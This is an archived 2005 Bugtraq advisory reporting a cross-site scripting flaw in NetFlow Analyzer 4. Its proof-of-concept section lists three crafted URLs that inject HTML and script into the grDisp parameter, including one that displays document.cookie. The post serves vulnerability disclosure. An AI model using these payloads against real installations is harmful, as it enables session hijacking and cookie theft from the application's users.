[40791] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

NetFlow Analyzer 4 XSS Vulnerability

daemon@ATHENA.MIT.EDU (why@nsfocus.com)
Tue Oct 18 17:54:50 2005

Date: 18 Oct 2005 03:37:24 -0000
Message-ID: <20051018033724.21717.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: why@nsfocus.com
To: bugtraq@securityfocus.com

NetFlow Analyzer 4
http://manageengine.adventnet.com/products/netflow/

I encountered Cross Site Scripting Vulnerabilities in some files of the NetFlow Analyzer 4, with this files, sending a specially crafted url you can execute commands in the client side.

____Proof of Concept______

http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<h1>test</h1>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert("test")</script>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert(document.cookie)</script>


Why, why@nsfocus.com


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[40791] in bugtraq

NetFlow Analyzer 4 XSS Vulnerability

daemon@ATHENA.MIT.EDU (why@nsfocus.com)Tue Oct 18 17:54:50 2005

daemon@ATHENA.MIT.EDU (why@nsfocus.com)
Tue Oct 18 17:54:50 2005